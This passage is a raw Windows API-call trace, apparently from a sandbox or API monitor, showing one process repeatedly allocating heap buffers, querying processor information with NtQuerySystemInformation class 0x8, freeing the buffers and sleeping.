NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0260.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0260.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0260.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0260.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0260.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0260.720] Sleep (dwMilliseconds=0x110) [0261.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0261.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0261.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0261.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0261.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0261.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0261.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0261.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0261.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0261.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0261.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0261.017] Sleep (dwMilliseconds=0x110) [0261.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0261.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0261.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0261.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0261.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0261.114] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0261.115] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0261.115] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0261.115] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0261.115] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0261.116] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0261.116] Sleep (dwMilliseconds=0x110) [0261.149] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0261.149] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.149] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0261.149] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0261.149] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.150] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0261.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0261.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0261.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0261.156] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0261.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0261.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0261.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0261.157] Sleep (dwMilliseconds=0x110) [0261.525] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0261.525] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.525] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0261.525] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0261.526] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.526] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0261.526] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0261.526] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.526] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0261.526] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0261.527] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0261.528] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0261.528] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0261.528] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0261.529] Sleep (dwMilliseconds=0x110) [0261.776] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0261.776] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.777] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0261.777] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0261.777] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.778] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0261.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0261.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0261.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0261.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0261.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0261.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0261.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0261.781] Sleep (dwMilliseconds=0x110) [0261.880] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0261.880] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.881] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0261.881] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0261.881] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.882] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0261.882] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0261.882] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.883] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0261.887] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0261.887] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0261.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0261.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0261.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0261.890] Sleep (dwMilliseconds=0x110) [0261.918] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0261.918] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0261.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0261.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0261.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0261.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0261.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0261.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0261.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0261.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0261.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0261.925] Sleep (dwMilliseconds=0x110) [0261.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0261.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0261.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0261.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0261.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0261.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0261.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0261.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0261.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0261.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0261.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0261.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0261.942] Sleep (dwMilliseconds=0x110) [0262.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0262.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0262.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0262.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0262.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0262.239] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0262.239] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0262.239] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0262.240] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0262.240] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0262.240] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0262.240] Sleep (dwMilliseconds=0x110) [0262.304] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0262.304] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.309] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0262.309] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0262.309] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.310] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0262.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0262.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0262.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0262.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0262.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0262.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0262.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0262.314] Sleep (dwMilliseconds=0x110) [0262.351] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0262.351] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.352] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0262.355] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0262.355] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.356] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0262.358] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0262.358] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.358] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0262.358] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0262.358] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0262.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0262.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0262.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0262.359] Sleep (dwMilliseconds=0x110) [0262.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0262.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0262.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0262.391] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0262.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0262.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0262.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0262.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0262.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0262.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0262.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0262.394] Sleep (dwMilliseconds=0x110) [0262.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0262.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0262.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0262.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0262.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0262.410] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.411] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0262.411] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0262.411] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0262.411] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0262.412] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0262.412] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0262.412] Sleep (dwMilliseconds=0x110) [0262.423] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0262.423] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.423] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0262.423] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0262.423] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.424] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, 